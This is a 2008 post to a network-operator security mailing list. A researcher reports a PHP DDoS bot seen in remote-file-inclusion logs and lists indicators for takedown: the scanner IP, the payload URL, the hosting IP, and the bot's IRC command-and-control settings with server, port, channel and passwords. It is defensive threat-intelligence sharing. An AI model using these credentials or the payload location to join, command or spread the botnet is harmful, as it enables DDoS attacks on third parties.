[nsp-sec] PHP bot with ddos - hosted in UK, attn AS29131, botnet in AS16276
Jose Nazario
jose at arbor.net
Thu Oct 2 16:29:16 EDT 2008
while digging through some RFI logs and refining data processing, i came
across this little guy:
scanner 151.60.130.197, EU, 1267,
URL "http://r3df0x.altervista.org/ddoss.txt",
host 78.129.205.40, GB, 29131
not sure how many attacks can be tied to it.
IRC server info:
var $config = array("server"=>"91.121.86.73",
"port"=>6666,
"pass"=>"rull4",
"prefix"=>"[eRBaR0X]",
"maxrand"=>5,
"chan"=>"###eRBaR0X###",
"key"=>"satana",
"modes"=>"+q",
"password"=>"rull4",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember:
/setvhost
eRBa.R0X)
that IRC server:
AS | IP | CC | AS Name
16276 | 91.121.86.73 | FR | OVH OVH
server is live:
; connect 91.121.86.73 6666
:Limits.ArEa51.net NOTICE AUTH :*** Looking up your hostname...
:Limits.ArEa51.net NOTICE AUTH :*** Found your hostname
heads up ... all pieces of this live at 16:30 US Eastern.
--
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
More information about the nsp-security
mailing list